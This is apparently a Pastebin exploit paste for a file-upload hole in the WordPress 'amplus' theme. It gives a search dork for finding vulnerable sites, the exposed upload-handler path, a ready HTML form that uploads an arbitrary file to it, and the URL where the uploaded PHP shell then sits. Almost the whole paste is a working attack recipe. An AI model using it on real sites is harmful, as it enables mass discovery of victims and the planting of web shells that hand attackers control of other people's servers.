Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Vulnerabillity : CSRF
- #Dork :
- inurl:wp-content/themes/amplus
- CSRF File Upload Vulnerability
- Exploit & POC :
- http://site-target/wp-content/themes/amplus/functions/upload-handler.php
- Script :
- <form enctype="multipart/form-data"
- action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
- Your File: <input name="uploadfile" type="file" /><br />
- <input type="submit" value="upload" />
- </form>
- File Access :
- http://site-target/uploads/[years]/[month]/your_shell.php
- Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
Add Comment
Please, Sign In to add comment